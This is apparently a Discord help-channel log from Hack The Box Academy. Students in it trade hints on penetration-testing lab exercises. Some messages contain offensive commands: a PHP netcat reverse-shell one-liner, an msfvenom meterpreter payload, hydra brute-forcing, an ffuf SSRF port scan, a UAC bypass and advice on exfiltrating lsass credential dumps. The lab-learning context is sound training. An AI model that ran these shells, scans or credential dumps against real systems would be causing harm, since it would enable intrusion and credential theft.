#modules

1 messages Ā· Page 324 of 1

cloud urchin
#

then yeah, you should probably try what they taught about ssh.

young smelt
#

I've stopped here too. Any hint?

signal shell
#

I found a small typo that needs correction in one of the modules solution. Where should I report this ?

limber river
fathom pendant
#

i'm genuinely enjoying tackling AEN blind :)

unique ether
#

Hi

midnight galleon
#

what does testing if POST parameter 'xyz' is dynamic means in sqlmap ?

unique ether
#

Is the vuln assessment module really 2 hrs?

ancient lark
#

Hello I have a question, I want to do the new path "Active Directory Penetration Tester". What is the best subscription to unlock all content?

median gale
#

@safe star @fathom pendant problem was the it was looking for proxychains.conf and the config was in proxychains4.conf. Copy pasted the whole thing and it was ready

ancient lark
midnight galleon
#

I think they deliberately made the two Tier 4 ad modules T 3 so Gold Annual can unlock the full path (Which is awesome move!)

midnight galleon
midnight galleon
fathom pendant
ancient lark
midnight galleon
#

if you ONLY want the ad pathway then it will cost you less since the cashback thing will pay for about 3 modules

ancient lark
#

Will probably get annually

#

I want to do more then only this path

stark lark
#

Howcome the only way to do this Skill Assessment (AEAD #2) be through a method not taught in the module?

fathom pendant
#

It's briefly talked about

fathom pendant
stark lark
fathom pendant
#

Something about nightmares or potatoes, if you need a hint

#

Technically, the tools were given

#

But yes, I agree

stark lark
earnest mulch
#

academy favicon is borked or something

fading oracle
#

did anyone do the mssql, sccm skills assesment yet? i have a question / problem and idk if its a lab issue or mine?

autumn pilot
#

feel free to dm me

green pagoda
#

The lvl of chat is to hight for me

stark lark
autumn pilot
#

Is there a C:\Temp directory?

astral temple
#

Would someone be available about 'HTTP Attacks - HTTP Response Splitting'. The suggestions in this chat and those in the forum did not help me.

stark lark
# autumn pilot Is there a `C:\Temp` directory?

From the output it doesn't indicate. But I also tried to append it to current folder.

I also tried to see if I could navigate to the users desktop, documents folder etc. using cd but I don't think xp_cmdshell lets you navigate like that? Do you know

karmic orbit
#

I need to 'Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer. '

#

There are five shares, four of which I can access as administrator, and one I can access as user 'Alex', which I have the password to. The one accessible by Alex just contains the password for the admin user.

autumn pilot
fading oracle
karmic orbit
hexed lintel
#

unable to kill/stop neo4j

fiery berry
# hexed lintel

check the logs or as an alternative pgrep -f neo4j and kill the process.

hexed lintel
#

no output for pgrep

fiery berry
hexed lintel
karmic orbit
fiery berry
viral lotus
#

I am willing to get dumb question of the day if it helps me progress šŸ¤¦ā€ā™‚ļø , I have been stuck on the DNS Zone Transfers section of Info Gathering - Web Edition for 2 weeks. is it beneficial to do the footprinting module before doing the Info Gathering one?

never mind I went into the footprinting one and its there, I suppose the easy modules are only easy if you do the pre-requisite module

compact matrix
#

I put PCI and it doesnt work??

viral lotus
compact matrix
#

PCI DSS I tried too

#

ah I missed the -

#

nice

digital crown
#

Windows Privilege Escalation
User Account Control
Why does rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll or C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe executes only once, I mean if i catch this on my nc, then cancel session and start it again, nc wont catch antyhing even though i execute command

viral lotus
dense eagle
#

Hi can i DM?

latent frigate
#

Are we having Issues now spawning academy boxes?

frosty tide
#

I'm kind of stuck on File Inclusion Assessment, I got into Admin panel able to read /etc/passwd but couldn't get RCE, can anyone give me some hint

rustic sage
#

Hello, would this be the best place to ask for help with a question I can't seem to work past from the Information Security Foundation module? Or is there another page that would be better to seek help? It's a pre-req I'm in for cpts.

coarse kraken
#

Hello chat

rustic sage
#

For whatever reason, I just seem to not be getting the echo result for this question. Any help would be appreciated, thank you. Submit the echo statement that would print "www2.inlanefreight.com" when running the last "Arrays.sh" script.

quiet trout
#

SSI or Local File Inlusion?

frosty tide
quiet trout
#

oh, good.

steep loom
#

Hello, there appears to be a problem with the MSSQL, Exchange, and SCCM Attacks module SCCM Site Takeover II question 2: Connect to the shared folder \LAB-DC\SCCMShare\SCCMServer01 using the hash of SCCM01$, and read the content of the file flag.txt:

the soultion shown varies between the given command, the terminal output shown, and the command that actully works on the machine.

if somone that has figure that out or a mod or somthing can reach out i can provide Screen shots and show you what i mean šŸ™‚

solid quarry
#

If I understanded your question you need to get the hash again, the hash that the module give you is not the "real" hash

safe star
solid quarry
#

Relay -> secretsump -> connect to the smb with the hash

steep loom
solid quarry
#

Can you provide me the command?

silent falcon
#

Is debit card not available for student accounts ? I can’t found in payment method

silent falcon
#

Can i dm to you for more detail cauz i can’t find it

limber river
#

you will not if you are not using a student email or your email is not verified

silent falcon
#

I only found credit card

limber river
#

I am not sure ask support

signal sluice
#

in modules theylist skills like sql injeciton , AD, php, jS etc do we need to learn these skill like developer or just learn stuff like security wise only

steep loom
stark lark
stark lark
bright pivot
#

why i cannot got the sub domain ?

sly trench
#

Hello, I am in pentester path, password attacks, password mutations. I used hashcat to create the mutated word list and I'm using hydra to brute force in ssh. It's taking soo long

#

Why is it is taking so long

#

I used -t 4 because otherwise it would say thread aborted or something like that

shut vapor
#

Can you eliminate half of the authentication problem by finding a usernames have reason to believe should be valid?

rustic sage
#

Colleagues how can I transfer a file when I have port 22 blocked between windows

shut vapor
solid quarry
#

smb, file upload via http or using a c2 / metasploit with the download command

#

you can use "download" from evil-winrm too if winrm is open

rustic sage
# shut vapor What module/section are you on?

Use the concepts taught in this section to pivot to the Windows server at 172.16.6.155 (jason:WellConnected123!). Submit the contents of Flag.txt on Jason's Desktop. Pivoting, Tunneling, and Port Forwarding// I'm trying to send the proxifier so I can route the host but I couldn't copy it to the other host

solid quarry
#

rdp is open?

shut vapor
#

yea I just finished that section. RDP is open and you can just copy/paste through the RDP session.

solid quarry
#

mkdir /tmp/tools
xfreerdp /v:<ip> /u:<user> /p:<password> /dynamic-resolution /drive:linux,/tmp/tools

sly trench
solid quarry
#

move the binary to the /tmp/tools, open file explorer on windows with the rdp open and click on the drive, If you are on windows there is a advanced option that lets you map a drive

lone cypress
#

Has anyone solved the Sightless machine?

sly trench
#

@solid quarry sei napoletano?

rustic sage
solid quarry
halcyon rune
#

z

shut vapor
cedar void
#

What is the cheapest and most effective way to secure cubes for this path if you don't want to pay for the platinum or gold subscription:

cedar void
solid quarry
#

yeah, but I don't think that buying silver one time grants you enough cubes

#

You have two options I think beside gold, buying silver and getting the extra cubes from the module (this will not get you all the modules for the path though) or you can spend $7100 to get the 7100 cubes

golden flower
#

Hello team i have a problem in the module Active Directory Enumeration & Attacks (ACL Abuse Tactics) the problem is i need change the password for the user “damundsen“ but when i launch "Set-DomainUserPassword -Identity damundsen -AccountPassword $UserPassword -Credential $Cred" give me this error "WARNING: [Set-DomainUserPassword] Unable to find user 'damundsen'" but if launch sharphound showme the damundsen in the domain, thanks a lot

tender nimbus
#

hey guys does someone have a clarification ?

shut vapor
fathom pendant
#

Sometimes it's fixed by simply completely uninstalling and reinstalling it

shut vapor
#

I'm thinking of sqsh. I couldn't identify sqsh vs mssqlclient visually.

fathom pendant
#

Well enum_db is a stored procedure in mssqlclient

solid basin
#

hey guys. new to HTB. gonna be in here alot. just wanted to reach out. any suggestions for the modules?

eager ledge
#

Hi,

Module: File Inclusion
Section: Skills Assessment

So far, I have managed to read the source code of index.php and have pretty much idea regarding how the parameter is being handled. But I am not able to get out of the web root directory. I am not able to read even /etc/passwd file.

I have tried absolute path, URL encoded path with bypass for extension. I have tried creating too long payload to overflow certain bits. I have tried PHP wrappers. I have tried remote file inclusion, but nothing. I am running out of options now 😦

sacred jacinth
sly trench
#

Same thing, it keeps going for a long time with no login

solid basin
solid basin
#

thank you. ill try not to annoy anyone too much lol

muted jacinth
#

Hey guys, had anyone finished the windows lateral movement SA?

dim wolf
#

a number of people have finished it

muted jacinth
#

I guess so, the real question should be is anyone here?

dim wolf
#

if you're looking for help, just ask your question and someone may answer

muted jacinth
dim wolf
#

better to ask than never. that's what this channel is for

#

you can always ask again if no one answers after some time

quiet trout
golden flower
bright pivot
quiet trout
bright pivot
rustic sage
#

how to get access to the general offtopic

#

enlighten me exciton

quiet trout
#

maybe try a diff wordlist?

bright pivot
quiet trout
#

sometimes variations exist, try ...top1million-10000.txt or w/e its spelt as a sanity check, doesnt take long

sacred jacinth
solid basin
sly trench
shut vapor
#

Are you still hitting SSH? I really don't recall which service returned results for me. I know some were slower than others though through that whole module.

rugged turtle
#

Hi guys, did anyone have some trouble in using mimikatz in the PtT from Windows section of the academy?
I'm using thet TGT extracted with mimikatz but seems like I can get it to work with Rubeus but not with mimikatz for some reason.

#

I suppose I'm doing somethnig wrong at that point, but I can't get what lol

sly trench
#

I've been trying a bunch of things since the first message abt this

jade latch
brave creek
#

Hi, I'm starting with Penetration Tester PATH.
In all the modules there is a ā€˜Cheat Sheet’ button but when I touch it it does nothing. Is this because the module doesn't have it or is it just a bug?

sacred jacinth
sly trench
shut vapor
#

SMB is a clear winner here as far as speed goes.

brave creek
sly trench
unique ether
#

Is the vuln assessment module really 2 hrs?

shut vapor
# sly trench I did that too

Ok. I have the solution. Do you want to share the command you're using to brute force, or the output you get? We can do here or my DM's are open.

fiery berry
fathom pendant
unique ether
fathom pendant
#

some of the content is just screenshots

#

ĀÆ_(惄)_/ĀÆ

sly trench
# shut vapor Ok. I have the solution. Do you want to share the command you're using to brute ...

I made the mutated password list with the command provided by the room, then I tried

hydra -l sam -P mut_password.list ssh://10.10.10.10
Then I did the same thing with ftp
Then I changed the custom.rule to exactly what was written in the room and did everything again.
Then I tried to enumerate smb with crackmapexec with both the mutated password file that I created the first time and also the one on the second time and that kept going on for hours. Then someone in the forum said to ensure that the file is sorted and there's no duplicates and I did this
sort -u mut_password.list -o 1_password.list
And then I tried to run hydra for ssh and ftp and crackmapexec for smb again and still didn't find the password

#

The target reset so many times

fathom pendant
#

not the one as written in the example

#

ftp should crack it

#

ssh is DREADFUL to work with

#

you can also use more threads

#

~48-50 is the most stable

#

more than that tends to drop connections

shut vapor
#

FTP should work fine too, but I had success with crackmapexec / SMB

#

This is why my output looked like. Can you run CME again (or NetExec its replacement) and compare?

shut vapor
#

Can you screen shot it?

fathom pendant
shut vapor
#

Humm.. ok. I'll bet there's some deviation though.

sly trench
shut vapor
#

sendit

rocky estuary
#

i'm doing the test section of shell and payload module i already rdp to host one and found tomcat webpage and logged in and created .war payload with msfvenom but its not working any idea what to do ?

fathom pendant
#

did you set the right lhost?

#

:)

rocky estuary
fathom pendant
#

as that's the one that matches the target ip

rocky estuary
vocal holly
#

dude, i'm having the same issue. did you resolve it?

smoky marten
rocky estuary
muted lotus
#

Hello, im working on the module, Detecting windows attacks with splunk, but when i tried to open the splunk on my vm or the pwnbox im getting the same error, The connection was reset, does anyone know if there is a problem with the vpn or with this exercise Detecting RDP Brute Force Attacks,

vocal bridge
#

On the final assessment of Command injection i cant figure out how to bypass getting a 302 error

#

my payload is GET /index.php?to=&view=2561732172.txt(injection operator)id

fathom pendant
#

me: why tf can't i connect
me 5s later: 🤦 not connected to vpn

vocal bridge
#

I am using & as inject operator but it doesnt give me id

fathom pendant
#

try all different functions of the website too

#

that looks like the copy feature?

vocal bridge
#

the hint pointed to the this one

fathom pendant
#

ah ye

#

try injecting at a different point in the command

wide river
fathom pendant
#

also url encoding may be helpful

vocal bridge
rocky estuary
fathom pendant
#

Faster to just do it yourself

rocky estuary
muted jacinth
#

If anyone has completed the windows lateal movement skill assess, I would gladly accept a hint for the second question.
If I'm getting this right i need to connect to the ||pswa on wsus.
i used proxychains with firefox and I'm able to connect on http://wsus/pswa but it only displays a black screen. and the https on port 8443 keeps timing out.||

any help will be appreciated

wild oriole
#

Hey, just doing SSRF lab, I see there is a simple way to get the flag instead of using gopher...
Do I miss something? or lab has issue?

bitter oracle
#

verification

wild oriole
bitter oracle
#

I saw in the guide said that I need to verify my email address, but I don't know if it requires any special operations.

#

Maybe is already done

fathom pendant
wet seal
#

Hi i actually came across one vulnerability related to jQuery UI xss but not sure where to upload the payload to check whether it is working or not. Can anyone help me on this?

#

jQuery UI 1.12.1 - and payload is .checkbox("refresh")

fathom pendant
quasi wave
#

Why is hashcat module not a part of cpts?

wet seal
fathom pendant
fathom pendant
quasi wave
#

Is that what your saying?

quasi wave
#

Or in cpts path they explain plenty of hashcat?

#

I’m confused as I don’t see why that would mean hashcat does not deserve a cpts module

#

For it to be explained in hashcat module

#

Unless you mean cpts includes everything I need to know about hashcat

fathom pendant
#

the hashcat module is very generic in the use cases; whereas the uses that are explained within the various cpts modules are specific; NTLMv2, TGS ...

#

the modes you see throughout the cpts modules are what you'll generically see in the environments

quasi wave
#

Ok I see now

fathom pendant
#

a short sidenote for *2john, in some cases the hashses can be valid for hashcat it's just prefixed with x:HASH so you can just cut out the first bit

#

the most basic syntax that you'll ever need is:
hashcat -m <mode> ['hash' | hashfile] <wordlist>

#

so if you know what it is but forgot the mode that's useful

#

some hashes have unique signatures

#

like tgs you'd see $krb5tgs$23$ (you'd generally get TGS from kerberoasting)

fathom pendant
#

Easier/quicker to use the site

upper ermine
#

Hello, i'm new here I just wanna know im I obligated to use the linux terminal included on the HTB site or I can link it with another linux simulator

safe star
#

you can just use your own vm

upper ermine
#

okay thanks bro

lean yoke
safe star
#

you probably have a space in the answer

lean yoke
#

i removed the space

safe star
#

then u put the wrong answer

lean yoke
safe star
#

3

lean yoke
#

smh

magic mango
#

My box for Public exploits it's loading up. Is anyone else having this issue or should i try a different browser? currently using firefox

mental slate
#

Yo

late moth
#

anyone have trouble setting up the socat redirection reverse shell in the pivoting, tunneling module? I have tried like 8 or 9 times now and cannot get a call back. Following step by step

cloud urchin
#

no i don't recall any issues

shut vapor
#

I feel super-duper awkward in the pivoting assessment. Any word of advice other than do it a dozen times to get used to it... then do it another dozen times with ligolo?

fathom pendant
#

just do it once with at least 2 tools

#

you won't always have access to some tools but ligolo (generally) hasn't failed me

junior flicker
#

Hey, I'm going through the Password Attacks module and the Password Mutation exercise is taking forever. I have spent the last four evenings and have gone through close to 10,000 password attempts with Hydra. Am I doing something wrong?

fathom pendant
#

don't attack ssh

#

and use moar threads

junior flicker
#

I tried to do more threads, but I think there was an issue because I was attacking ssh, which was an assumption on my part. Okay, I'll use one of the other services to brute force the password

#

Thank you!

novel lynx
#

So I am in the PIVOTING, TUNNELING, AND PORT FORWARDING Skills Assessment on question #4. I have the lsass.dmp file, but I am stuck on how I can get the file from the rdp session to my attack box, both webadmin and my attack box are not ping-able. I used the meterpreter lesson to establish a connection to the rdp session

cloud urchin
#

there are many different ways. if you're using rdp you can simply share a drive.

novel lynx
#

that was the first thing i tried with smb and ftp, but the two ips are not reachable

#

C:\Users\mlefay\AppData\Local\Temp>move lsass.DMP \10.10.14.63\CompData
The network path was not found.

red juniper
#

use xfreerdp

novel lynx
red juniper
novel lynx
#

the pwnbox

red juniper
#

xfreerdp /v:ip /u: /p: +clipboard /drive:fileshare,/home/htb

fathom pendant
fathom pendant
#

just replace drivename with whatever you want to name it and /home/htb with the full or relative path of the directory you wish to share

#

for instance i have a resources folder with all my tools to transfer at /home/marcielee/htb/resources <-- that's the full path i specify every time

#

xfreerdp does not expand things like ~

#

so in this case ~/htb/resources is not the same

#

even though normally you can cd to it

novel lynx
#

I appreciate the help. My session died and it appears the spawned box firewall is blocking my access now, so I think I need to start all over, which is going to take a while

fathom pendant
#

I don't recall a firewall being on this

novel lynx
#

ya you're right, the box just timed out lol

eager ledge
safe star
uncut ocean
#

Hey can anyone help me with Attacking Common Ports (DNS) part?

#

i have tried everything here doing subdomain brut forcing with subbrute and then use dig axfr command but did not get anything

safe star
#

did you find subdomains?

uncut ocean
#

Solved lol bruteforcing is worst

eager ledge
shell mason
#

Hey,
Im on the Serverside attacks module and im having trouble on the first exercise. I'm using ffuf and my request isnt returning anything, does anything here look wrong?

#

I also did this, it gave me too many returns to be true though

#

im so sorry i said "could not" instead of "failed to" 😭

dim wolf
shell mason
#

oh, why would something be running on the host? I thought this was pen testing a website hosted elsewhere

dim wolf
#

so which IP address can you use to check for services running internally

dim wolf
dim wolf
shell mason
#

So the local ip is what im supposed to be fuzzing, correct?

#

because im looking for open ports

#

ffuf -w ./ports.txt -u http://10.129.141.98/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://172.17.0.1:FUZZ/&date=2024-01-02" -fr "Failed to connect to" so something like this

#

ffuf -w ./ports.txt -u http://172.17.0.1/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb:FUZZ/availability.php&date=2024-01-02" -fr "Failed to connect to" nvm this seamed to return 3306 as an active port which is what the module says is supposed to happen

#

I have no idea what to do with the 3306 port, module doesnt explain very well, can someone explain to me

cloud urchin
#

you are sending a POST request with a data parameter on a web server that's vulnerable to ssrf. the fuzzing command finds ports that are accessible to the server internally.

#

its all in the module, what other command did you use besides ffuf? there's only one other i think

#

just like you could reach your netcat listener you can reach internal ports

eager ledge
#

For the "File Inclusion" module, all the questions are based on PHP application. Is it more common for PHP applications? How likely is it to find applications written on other languages vulnerable to LFI?

#

Also, how loading .php files eventually gets executed, giving us control, does it happen for other languages as well?

fathom pendant
#

As stated throughout the module the base concept remains the same for many frameworks

eager ledge
#

Taking example of python application(django), the endpoint is not a file, but a function. So, I don't quite get it how we can exploit them.

fathom pendant
#

Django is a database thing yeah?

eager ledge
#

Django is a python framework to bootstrap web application.

#

I just checked the intro section again. It states that "execute" is allowed by a limited functions, which makes sense. Most of it is reading system files.

pine dune
#

it says its wrong

#

Im a little confused

eager ledge
#

So, what we did in the exercise (RCE) is the absolute extent of the damage that LFI can do adn we should not expect that in general, but just reading files?

fathom pendant
#

Yeah a lot of code bases have some form of exec function

fathom pendant
#

Sometimes you can find exposed creds in a config file

pine dune
#

its also got this

fathom pendant
pine dune
fathom pendant
#

Read the whole mission brief to see what host 1 is

safe star
pine dune
wary turret
#

can anyone tell me why i cant write in general

fathom pendant
wary turret
safe star
#

I can’t remember

fathom pendant
#

Also as a note firefox is there on the foothold

pine dune
fathom pendant
safe star
#

Oh yeah

fathom pendant
#

It's literally there on the page

#

Ctrl-f for host

wary turret
pine dune
fathom pendant
fathom pendant
#

Not on the foothold you're on

fathom pendant
#

This assessment has you sat on a foothold targeting an internal network of hosts

pine dune
#

i am confused because this assessment says that we cant access the hosts anywhere outside the foot hold, then says "if we browse to the ip:8080"... but it doesnt connect to it when I try to browse to it on my own kali and also theres no firefox on the xfreerdp

fathom pendant
#

Yes there is

#

Type it in the terminal

pine dune
#

ahh yes I didd that...i wonder why it wasnt on the desktop

#

thank you

fathom pendant
#

Because silly

#

(Irdk, might have to submit an erratum for that kekhands )

pine dune
fathom pendant
#

That's not the internal host

#

The ips in the mission brief aren't placeholder

#

Internal == not 10.129.x.x

pine dune
#

Im sorry im still confused šŸ˜…

#

and I assume we exploit everything from this xfreerdp and dont use our own vm (as the xfreerdp has msfconsole and nmap too)

safe star
#

yes

fathom pendant
#

Indeed

pine dune
#

ok cool

fathom pendant
#

Read the engagement carefully

safe star
#

the rdp machine is on 2 networks

fathom pendant
#

I mean you could get fancy if you want and pivot but it's really not necessary

#

As everything you need is right there

safe star
#

wouldve been so much easier if i knew how back then

pine dune
#

okay cool

fathom pendant
pine dune
#

thankfully I have u guys šŸ˜„

fathom pendant
#

For now Kappa I'm gonn get cpts then leave

pine dune
#

😮

#

u joking šŸ˜…

fathom pendant
pine dune
#

yeah Ik but it helps for the advice

fathom pendant
#

Ye

pine dune
#

is the internal ip 127.0.0.1?

fathom pendant
#

Nope

pine dune
#

ahh ok

fathom pendant
#

Also

pine dune
#

ohh I see let me try

fathom pendant
#

the engagement gives you the ips/fqdn

#

And don't forget the creds on the desktop since you looked already

#

It's like the other most overlooked thing

pine dune
#

ok let me have a look

#

found it

#

172.16.1.0/23

#

now I just have to sweep the subnets from mask 0 to 23 to find the right subnet right?

safe star
#

you can, but marcielee said 3 times already that they give you the ips in the engagement letter

pine dune
#

ahh just saw the pictures now

#

šŸ˜‚

#

thank you

#

ahh needed to get rid of the s

fathom pendant
pine dune
#

yeahh thanks

fathom pendant
#

99ish% it's http

pine dune
#

ahh ok

pine dune
#

Hi i found a vulnerability for host 1

#

how can I download it and run it in msfconsole?

dim wolf
#

||this should already be in your modules dir.|| try searching it in msfconsole

pine dune
#

ok hold on pls

#

ok found it..I just have to put the username, password and rhosts... hopefully it works

#

got this problem

#

anyone have any ideas? should I change the TARGETURI to "host-manager/html"?

safe star
#

you can try manually uploading

pine dune
#

could u give me an idea on how I can do that?

#

like download the file, update the IP and port in it? have a listener and upload?

safe star
#

hacktricks has an example

latent frigate
#

Module: Password Attacks Lab - Medium
How can I download the file inside the share?
It seems to be a big file, so smbclient gives always the error: bparallel_read returned NT_STATUS_IO_TIMEOUT NT_STATUS_IO_TIMEOUT listing \*
mounting is also a problem, it hangs and does not move further

keen valve
#

Anyone did the Introduction to Windows Evasion Techniques ?
I have a problem in the Static Analysis section. I did everything as I was supposed to do:

[09/10/2024 02:52:23] Checking...
[09/10/2024 02:52:23] C:\Alpha\Static\NotMalware.exe - OK - Undetected by Microsoft Defender Antivirus

And now, because the checks passed, the flag.txt should appear in the same folder, containing the flag, however this is not the case

compact matrix
#

hi guys im going through the "knowledge check" with the GetSimple website, I have added my php reverse shell code into the website, opened nc on my terminal and nothing happens

#

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <MY_IP> <9443> >/tmp/f") ?>

#

this is what im using

#

and nothing happens

limber river
vocal holly
shell mason
#

hey guys im on the web fuzzing module and im really confused, I've ||found the /flag directory but i don't know how to submit that as an answer, ive tried alot and im wondering if theres something else im supposed to be doing? I've file fuzzed both the given directory and the /flag directory with the seclist common wordlist with every recommended file extension...||

grand solar
#

when doing "Window Privlege Escalation" moudles in the user privileges sections, I'm not seeing the privileges the modules are talking about when I do whoami /priv but I can use those privileges. Is this a error on my end or somethis else is going on?

#

nvm this user just doesnt have privileges SeTakeOwnershipPrivilege, strange

grand solar
#

is the user not supposed to have the SeTakeOwnership for this lab?

random lynx
#

Anyone doing Sightless rightnow?

sonic plume
grand solar
#

strange

#

idk why cmd works but not powershell

#

because i used cmd to run powershell...

sonic plume
#

you can also run powershell as administrator ig

lusty cipher
#

hello everyone, new guy here šŸ˜… I'm currently stuck at the skill assessment for the introduction to the windows command line, at the question no.8 "For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them. "

I've tried everything, searched every powershell module and member for user7, even run a script to find patterns such as "flag", "user" and "password" with no success.

Can anyone help me with this one?

quiet trout
#

the domain joined computer, the one you're ssh'ing to the DC from.

limber river
#

<@&861185840277487616>

severe phoenix
#

hi can anyone help me with " examining the logs located in the "C:\Logs\Dump" directory, determine the process that performed an LSASS dump". I've tried to filter by ID event 10 and build an XML query fitering for target user != source user but it doesn't work (bad query)

<QueryList>
<Query Id="0" Path="file://C:\Logs\Dump\LsassDump.evtx">
<Select Path="file://C:\Logs\Dump\LsassDump.evtx">
*[System[(EventID=10)] and EventData[Data[@Name='SourceUser'] and Data[@Name='TargetUser']]]
</Select>
</Query>
</QueryList>

quiet trout
#

what did you filter by event id 10 with? event viewer?

severe phoenix
#

yes event viewer

#

i'll try with ps

quiet trout
#

sec let me pull out my notes from the win logs section i'll get you a one liner

#

unless you're gosu ps user?

#

(im not)

severe phoenix
#

no

quiet trout
#

ok two thigns that might be helpful, i think one is perhaps an alias of the other (dunno tho)

wevtutil /? and Get-WinEvent -ListLog* and of course man Get-WinEvent

#

some other stuff here... wevtutil qe Security /c:5 /rd:true /f:text <-- query events, wevtutil gli "Windows PowerShell" <-- gather log infos (theres an alias there i assume gli = gatherLogInfo

#

you'll need to modify those secondary cmds of course, to yuor needs but thats how they're used in practice

severe phoenix
#

ok thanks, so there's no possibilty to do this via event viewer?

quiet trout
#

there could be im not looking at that module specifically but are you sure that the *.evtx file you're resourcing exists? have you found it in the file system?

#

as a sanity check have you filtered for IDs other than 10? or had it list all events, rather. do you see any info in the event viewer at all?

severe phoenix
#

yes the evtx file is in the dir provided by HTB, i've filtered only for id 10 and try to filter with XML but the query seems bad

#

i'll try with the cmds you provide me

quiet trout
#

ok and you're sure that the evtx file HAS events in it right?

severe phoenix
#

yes 14.344 events

quiet trout
#

sorry if that sounds silly, but sanity checks here. starting with a wide net and closing in kinda thing

#

yeah xml isnt my forte i'd try those two CLI event parsing cmds and see if you have better luck that route

#

i cant say anything about your xml query being correct but i would try the CLI tools then if you resolve it that way go back at the XML after to see what mightve been wrong if it still interests you

severe phoenix
#

k ty

lusty cipher
quiet trout
lusty cipher
quiet trout
#

oh ok this tripped me up too. the password is the answer from the previous exercise

#

did you realize that? @lusty cipher

lusty cipher
#

the password for the ssh, yes

#

I connect to user 7, all good, then I search the powershell modules, and cant find the credentials for the domain controller

quiet trout
#

it only mentions "previous flag" in like the first exercise then never mentions it again so that kinda threw me for a loop

#

ok so we're on user 7 exercise?

lusty cipher
#

yeap

#

the problem I have is that I run powershell on user7, search every module and member and cant find any usernames or passwords for the domain controller connection

quiet trout
lusty cipher
#

yeap, that's the one

sly trench
#

Guys I don't understand how file uploads work
I logged in a windows host through remmina, I'm trying to exfiltrate lsass creds to my Kali VM but idk why the file isn't going there

quiet trout
#

Ok so you might want to DM me here because your current process may contain spoilers, if you're interested, DM me with the steps you've taken and the passwords you've tried so far so i can get an idea where you're at...

#

@lusty cipher ^

vocal holly
#

I need help with one question from the Skill assessment part of Info gathering. (What is the API key in the hidden admin directory that you have discovered on the target system?)
I have done all questions. only this one is remaining. I also found a hidden directory in the robots.txt file from one of the subdomains but when i open it, it shows connection error. What am i supposed to do here?

safe cairn
cunning quarry
#

Yes

old oasis
safe cairn
#

I saw my answer but seems answer to an other question

old oasis
#

Tip: try going deeper

severe phoenix
# quiet trout i cant say anything about your xml query being correct but i would try the CLI t...

ok finally 've found a solution.
Comments are not in eng but in summary -> define the path, extract event with ID 10, iterate and select suser!=tuser and finally print the process.
Scroll a bit through the process and found this process with unusual name (i don't write here the solution)

Definisci il percorso del file di log
$logPath = "C:\Logs\Dump\LsassDump.evtx"

Estrai gli eventi Sysmon con EventID 10
$events = Get-WinEvent -Path $logPath | Where-Object { $_.Id -eq 10 }

Itera su ciascun evento e stampa le informazioni
foreach ($event in $events) {
$xml = [xml]$event.ToXml()
$sourceUser = $xml.Event.EventData.Data[0].'#text' # Modifica lindice se necessario
$targetUser = $xml.Event.EventData.Data[1].'#text' # Modifica lindice se necessario
$processName = $xml.Event.EventData.Data[5].'#text' # Modifica lindice se necessario
Write-Output "Source User: $sourceUser"
Write-Output "Target User: $targetUser"
Write-Output "Process Name: $processName"
}

vocal holly
safe cairn
vocal holly
quiet trout
worldly badger
#

hello guys. can you give me an answer for "Using the metasploit framework" module; "Introduction to Metasploit" section question: What command do you use to interact with the free version of Metasploit? There is no answer for this question in "Show Solution". I tried answer "msfconsole" but it didnt work.

severe phoenix
quiet trout
#

ah good deal, glad you got it sorted.

worldly badger
safe cairn
#

watchout some spaces, remember to "trim" your answers

worldly badger
#

first time i faced this type of occasion. after a few tries it suddenly worked

#

thanks

safe cairn
quiet trout
dry ledge
#

Hello everyone, if someone is available I'd have a question about one of the the skills assessment question from the Security Monitoring and SIEM fundamentals

sly trench
#

Guys I don't understand how file uploads work
I logged in a windows host through remmina, I'm trying to exfiltrate lsass creds to my Kali VM but idk why the file isn't going there

safe cairn
shut vapor
#

Backtrack to the File Transfer module if you're in the CPTS path. There are plenty of options available.

dusty spire
#

Hello, good afternoon. I’m working on the "ICMP Tunneling with SOCKS" academy problem. I read in the forum that you recommended deleting and making it static, which I did, but now when running "make" I get another error: "make: *** [Makefile:335: aclocal.m4] Error 127". Could you please tell me what I might be doing wrong?

safe cairn
stone meteor
#

does anyone know how to fix this? used
msfvenom -p windows/x64/meterpreter/reverse_https lhost=x -f exe -o backupscript.exe LPORT=4444

tried both tcp and https -- no luck

target - windows. running the exe from the webshell

brazen sleet
#

Im doing the:
Detection Example 2: Detecting Unmanaged PowerShell/C-Sharp Injection

I have copied the powershell commands they show in the lesson to showcase the unmanaged powershell injection. I changed the "Process ID of Spoolsv.exe" part to the actual process id. SO mine looks like this:
-ep bypass

Import-Module .\Invoke-PSInject
Invoke-PSInject -ProcId 2408 -PoshCode "V3JpdGUtSG9zdCAiSGVsbG8sIEd1cnU5OSEi"

However the spoolsv.exe doesn't become managed? Why is this? It seems to jnust create another powershell process in process hacker? COuld anyone help m,e with this?

brazen sleet
#

Also the 3rd part of this:
Detection Example 3: Detecting Credential Dumping

Just thought i'd mention that the lesson shows the executable name as "mimikatz.exe" but this is WRONG!!! It is called "agentexe" for some reason.

fathom pendant
fathom pendant
wild sage
#

Im working on the SQLmap bypassing web app question 2 (case 9). I've put the uid parameter in randomize and each time I get try to use the output, I get BAD UID responses. Any idea what I need to change?

safe star
#

what does your command look like?

#

it worked for me

brazen sleet
#

PS C:\Tools\PSInject> powershell -ep bypass

Import-Module .\Invoke-PSInject.ps1
Invoke-PSInject -ProcId 2408 -PoshCode "V3JpdGUtSG9zdCAiSGVsbG8sIEd1cnU5OSEi"
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

anyonje know why this isn't workjing? been stuck for so long lol

wild sage
safe star
#

did u try -p 'id'?

wild sage
#

no, ill try that

sly trench
#

Ik I could just encode and decode the file but cmon im supposed to become a hacker how tf is it possible I can't transfer a fucking file

#

Time out, always time out

#

But pings work

fathom pendant
#

I've had no issues with transferring with xfreerdp

topaz cliff
#

Guys, all modules up to (including) Tier II" should be unlocked for Student Plan?

fathom pendant
safe star
sly trench
fathom pendant
#

Scp as well I'm able to find the file

#

Sounds like your vpn may not be stable

sly trench
